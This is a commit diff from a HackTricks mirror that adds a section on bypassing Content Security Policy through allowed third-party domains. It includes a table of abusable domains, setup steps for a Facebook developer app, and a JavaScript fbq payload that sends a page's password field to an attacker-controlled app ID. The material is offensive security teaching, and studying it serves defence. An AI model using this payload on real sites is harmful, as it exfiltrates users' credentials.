0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

Update CSP methods for third parties

This commit is contained in:
Felipe Molina 2023-10-23 15:43:34 +01:00
parent e0975f3af6
commit 121d793ce0
1 changed files with 47 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

47
pentesting-web/content-security-policy-csp-bypass/README.md
View File

@ -287,6 +287,53 @@ https://www.youtube.com/oembed?callback=alert;
The same vulnerability will occur if the **trusted endpoint contains an Open Redirect** because if the initial endpoint is trusted, redirects are trusted.
### Third Party Abuses
As described in the (following post)[https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses], there are many third party domains, that might be allowed somewhere in the CSP, can be abused to either exfiltrate data or execute JavaScript code. Some of these third-parties are:
| Entity | Allowed Domain | Capabilities |
|--------|----------------|--------------|
| Facebook | www.facebook.com, *.facebook.com | Exfil |
| Hotjar | *.hotjar.com, ask.hotjar.io | Exfil |
| Jsdelivr | *.jsdelivr.com, cdn.jsdelivr.net | Exec |
| Amazon CloudFront | *.cloudfront.net | Exfil, Exec |
| Amazon AWS | *.amazonaws.com | Exfil, Exec |
| Azure Websites | *.azurewebsites.net, *.azurestaticapps.net | Exfil, Exec |
| Salesforce Heroku | *.herokuapp.com | Exfil, Exec |
| Google Firebase | *.firebaseapp.com | Exfil, Exec |
If you find any of the allowed domains in the CSP of your target, chances are that you might be able to bypass the CSP by registering on the third-party service and, either exfiltrate data to that service or to execute code.
For example, if you find the following CSP:
```
Content-Security-Policy: default-src 'self www.facebook.com;
```
or
```
Content-Security-Policy: connect-src www.facebook.com;
```
You should be able to exfiltrate data, similarly as it has always be done with (Google Analytics)[https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp]/(Google Tag Manager)[https://blog.deteact.com/csp-bypass/]. In this case, you follow these general steps:
1. Create a Facebook Developer account here.
1. Create a new "Facebook Login" app and select "Website".
1. Go to "Settings -> Basic" and get your "App ID"
1. In the target site you want to exfiltrate data from, you can exfiltrate data by directly using the Facebook SDK gadget "fbq" through a "customEvent" and the data payload.
1. Go to your App "Event Manager" and select the application you created (note the event manager could be found in an URL similar to this: https://www.facebook.com/events_manager2/list/pixel/[app-id]/test_events
1. Select the tab "Test Events" to see the events being sent out by "your" web site.
Then, on the victim side, you execute the following code to initialize the Facebook tracking pixel to point to the attacker's Facebook developer account app-id and issue a custom event like this:
```JavaScript
fbq('init', '1179785999289471');
fbq('trackCustom', 'My-Custom-Event',{
data: "Secret ingredient is: '"+document.getElementById('user-password').innerText+"'"
});
```
As for the other third-party domains specified in the previous table, there are many other ways you can abuse them. Refer to the previously referred (blog post)[https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses] for additional explanations.
### Folder path bypass
If CSP policy points to a folder and you use **%2f** to encode **"/"**, it is still considered to be inside the folder. All browsers seem to agree with that.\